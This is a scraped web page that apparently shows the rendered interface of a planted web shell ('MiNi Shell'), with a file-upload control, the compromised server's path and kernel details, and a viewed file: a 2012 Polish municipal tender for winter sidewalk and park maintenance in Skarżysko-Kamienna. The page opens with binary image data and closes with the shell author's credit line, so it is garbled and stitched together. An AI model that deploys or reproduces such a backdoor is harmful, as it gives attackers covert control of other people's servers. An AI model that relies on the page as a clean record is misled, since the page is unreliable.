JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120926/205615-N-2012.html

<p class="kh_header"><b>Skarżysko-Kamienna: Zimowe utrzymanie chodników, przystanków, skwerów, alejek parkowych, schodów, placów, parkingów, zatok postojowych i kładek dla pieszych oraz pozimowe sprzątanie chodników, skwerów, alejek parkowych, schodów i parkingów  w sezonie 2012/2013 strefa III</b><br>
<b>Numer ogłoszenia: 205615 - 2012; data zamieszczenia: 26.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Skarżysko-Kamienna , ul. Sikorskiego 18, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2520100, faks 041 2520200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umskarzysko.bip.doc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie chodników, przystanków, skwerów, alejek parkowych, schodów, placów, parkingów, zatok postojowych i kładek dla pieszych oraz pozimowe sprzątanie chodników, skwerów, alejek parkowych, schodów i parkingów  w sezonie 2012/2013 strefa III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest gotowość świadczenia (tzw. akcja bierna) oraz wykonywanie (tzw. akcja czynna) usługi zimowego utrzymania  chodników, przystanków, skwerów i alejek parkowych, placów, parkingów i kładek dla pieszych oraz pozimowe sprzątanie chodników, skwerów i alejek parkowych  w sezonie 2012/2013 zgodnie z zakresem rzeczowym określonym w opisie przedmiotu zamówienia (załącznik nr 1 do projektu umowy) oraz projektem umowy.
Zimowe utrzymanie chodników, przystanków:
w akcji czynnej - polegającej na pełnym zimowym utrzymaniu obsługiwanych terenów poprzez usuwanie śniegu i błota pośniegowego, posypywanie piaskiem (lub piaskiem z solą) przy równoczesnym lub osobnym wystąpieniu czynników pogodowych: opadów atmosferycznych, zawiei i śliskości, prowadząc do oczyszczenie ze śniegu i błota pośniegowego w przeciągu 4 godzin od ustania opadów;
w akcji biernej - polegającej na utrzymaniu stałej gotowości do ewentualnego     prowadzenia akcji  czynnej. Akcja ta wprowadzana będzie w przypadku braku opadów śniegu przy jednocześnie utrzymujących się temperaturach poniżej 00C lub temperaturach dodatnich w dzień a ujemnych w nocy. W ramach tej akcji Wykonawca zobowiązany jest do systematycznego oczyszczenia nawierzchni z pozostawionej w trakcie akcji czynnej warstwy śniegu poprzez wymiecenie, odkucie i wywiezienie odkutej warstwy, nie dopuszczając w ten sposób do powstania zlodowaciałej, ubitej 
i przymarzniętej do nawierzchni warstwy. Lodu oraz do patrolowania utrzymywanych terenów.
Zimowe utrzymanie skwerów, alejek parkowych , schodów i placów polegać będzie na stałym utrzymaniu obsługiwanych terenów poprzez zgarnięcie wraz z uprzątnięciem śniegu z całej powierzchni terenów wskazanych  w załączniku nr 3 do umowy skwerów, alejek parkowych, schodów i placów, odkucie do czystej nawierzchni schodów (jeżeli występują na danym terenie) oraz usunięciu śliskości poprzez posypanie piaskiem lub piaskiem z solą, usunięcie śniegu z ławek,  oczyszczenie terenu z zanieczyszczeń (papierów, folii, szkieł, niedopałków papierosów itp.).
Zimowe utrzymanie parkingów i kładek dla pieszych na polecenie Zamawiającego
            polegać będzie na zgarnięciu wraz z uprzątnięciem śniegu z całej powierzchni
            parkingów i zatok postojowych wskazanych w załączniku nr 3 do umowy oraz
            usunięcie śliskości przez posypanie piaskiem lub piaskiem z solą  oraz zgarnięciu
           śniegu z kładki dla pieszych na całej szerokości i posypaniu piaskiem. Zakres
           parkingów, zatok postojowych i kładek dla pieszych przeznaczonych do zimowego
           utrzymania określany będzie każdorazowo w formie pisemnej, załącznik nr 6 do
            projektu umowy, zależnie od potrzeb. Zakresy stanowić będą integralną część umowy.
Pozimowe sprzątanie chodników wraz z odcinkiem na długości zatoki autobusowej (jeżeli występuje), skwerów, alejek parkowych, schodów, parkingów - polega na zebraniu z całej powierzchni utrzymywanych zimą chodników, skwerów, alejek parkowych, schodów, i parkingów odpadów powstałych z materiałów uszorstniających używanych do zwalczania śliskości, a następnie ich unieszkodliwienia lub wykorzystania gospodarczego . Zakres terenów przeznaczonych                       do pozimowego sprzątania określa załącznik nr 5 do umowy.
      Z uwagi na usprawnienie świadczenia usług przy zimowym utrzymaniu chodników,
     przystanków, skwerów, alejek parkowych, schodów, placów, parkingów, zatok 
     postojowych oraz kładek dla pieszych teren miasta Skarżyska - Kamiennej został
     podzielony na trzy strefy.
           Wykaz terenów przeznaczonych do zimowego utrzymania szczegółowo określają
           załączniki nr 3 oraz 4 do projektów umów.
           Wykaz terenów przeznaczonych do pozimowego sprzątania szczegółowo określ
            a załącznik nr 5 do projektów umów. 
Na podstawie przeprowadzonych akcji w sezonie zimowym 2011/2012 przewiduje się, że w trakcie realizacji niniejszego zamówienia w zależności od warunków pogodowych uruchomionych zostanie:
akcji czynnych zimowego utrzymania chodników, przystanków - maksimum 70 dób rozliczeniowych,
akcji biernych zimowego utrzymania chodników, przystanków - maksimum 40 dób rozliczeniowych,
      zimowego utrzymania skwerów, alejek parkowych, schodów, placów - maksimum
     110 dób rozliczeniowych
           zleceń Zamawiającego na zimowe utrzymanie parkingów, zatok postojowych i 
           kładek dla pieszych -  maksimum 20 zleceń.
Ustalenie ostatecznej ilości i rodzaju akcji zimowego utrzymania uwarunkowane będzie warunkami pogodowymi.
Doba rozliczeniowa danego typu akcji zimowego utrzymania, rozpoczyna się o godzinie 000 i trwa do godziny 2400.
Wykonawca realizujący zadanie zapewnia:
- dostateczną ilość sił i środków gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi,
- służbę dyżurną,
- przekazywanie Zamawiającemu informacji o warunkach panujących na drogach,
- prowadzenie ewidencji usług realizowanych w ramach zawartej umowy.
W okresie trwania akcji zimowego utrzymania Wykonawca podejmuje samodzielnie, przy jednoczesnej ścisłej współpracy z przedstawicielami Zamawiającego, decyzje w zakresie: rodzaju i ilości użytego sprzętu, sposobie odśnieżania i zwalczania śliskości.
Stan gotowości do akcji zimowego utrzymania trwa  od 1 listopada  2012 r do 15 kwietnia 2013 r. Uruchomienie
i zawieszenie akcji zimowego utrzymania następować będzie na podstawie pisemnego powiadomienia Wykonawcy przez Zamawiającego.
Pozimowe sprzątanie chodników, skwerów , alejek parkowych, schodów, parkingów nastąpi po pisemnym zawiadomieniu Wykonawcy o zawieszeniu  akcji zimowego utrzymania. Sprzątanie winno być zrealizowane w ciągu 14 dni licząc od dnia zawieszenia akcji zimowego utrzymania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.61.20.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda  wniesienia wadium w kwocie:
      4.000,00 zł ( słownie: cztery tysiące zł)
      przed upływem terminu składania ofert w jednej z form określonych w art. 45 ust. 6 Pzp, czyli w: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z ty że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42,poz. 275 ). 
W przypadku wniesienia wadium w pieniądzu wykonawca wpłaca wadium przelewem na 
rachunek bankowy nr: Bank Spółdzielczy Skarżysko-Kamienna 11 8520 0007 2002 0018 8883 0008 z dopiskiem Wadium przetargowe: Zimowe utrzymanie chodników, przystanków, skwerów, alejek parkowych, schodów, placów, parkingów, zatok postojowych i kładek dla pieszych oraz pozimowe sprzątanie chodników, skwerów, alejek parkowych, schodów i parkingów  w sezonie 2012/2013 strefa III
Zamawiający postuluje załączenie do oferty potwierdzonej kopii dokumentu
stwierdzającego dokonanie przelewu na rachunek bankowy zamawiającego. 
W przypadku wniesienia wadium w innej formie wykonawca załącza do oferty kopię dokumentu stwierdzającego wniesienie wadium i załącza oryginał tego dokumentu w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty. 

	O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i godzina wpływu środków na rachunek Zamawiającego.
	 Zamawiający zwraca wadium wszystkim wykonawcom, niezwłocznie po wyborze oferty             najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem wykonawcy, którego oferta została wybrana jako  najkorzystniejsza, z zastrzeżeniem ust. 4a.
	 Wykonawcy, którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia  należytego wykonania umowy, jeżeli jego wniesienia żądano.
 Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy,  który wycofał ofertę przed upływem terminu składania ofert.
 Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz odsetkami wynikającymi z umowy rachunku bankowego, na którym by ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.	  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta
 została wybrana: 
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
b.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony , jeżeli wykonawca  składający ofertę wykaże, że w ciągu ostatnich 3 lat wykonywał usługi polegające na odśnieżaniu chodników, przystanków, skwerów, placów, zatok postojowych o łącznej wartości nie mniejszej niż: 150.000,00 zł brutto. W celu potwierdzenia tego warunku wykonawca musi przedstawić  wykaz wykonanych usług zimowego utrzymania w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat i miejsca wykonania oraz dokumenty potwierdzające, że usługi o których mowa wyżej zostały wykonane należycie (listy referencyjne).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy mogą być dokonane wyłącznie w formie pisemnego dwustronnie zaakceptowanego aneksu pod rygorem nieważności. 
2.	Zmiana umowy jest możliwa, zgodnie z  art. 144 ustawy Prawo zamówień publicznych, w niżej wymienionym zakresie:
1.	ceny brutto na wykonywane zamówienia publiczne jedynie w przypadku zmiany urzędowej stawki podatku od towarów i usług
2.	zmiany zakresu rzeczowego robót 
3.	danych objętych fakturą, w szczególności NIP-u, adresu, nazwy lub numeru rachunku Wykonawcy w przypadku ich zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umskarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Skarżysku-Kamiennej ul. Sikorskiego 18, 26-110 Skarżysko-Kamienna pok. nr 96.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 10:45, miejsce: Urząd Miasta w Skarżysku-Kamiennej ul. Sikorskiego 18, Biuro Obsługi Interesanta, parter pokój nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com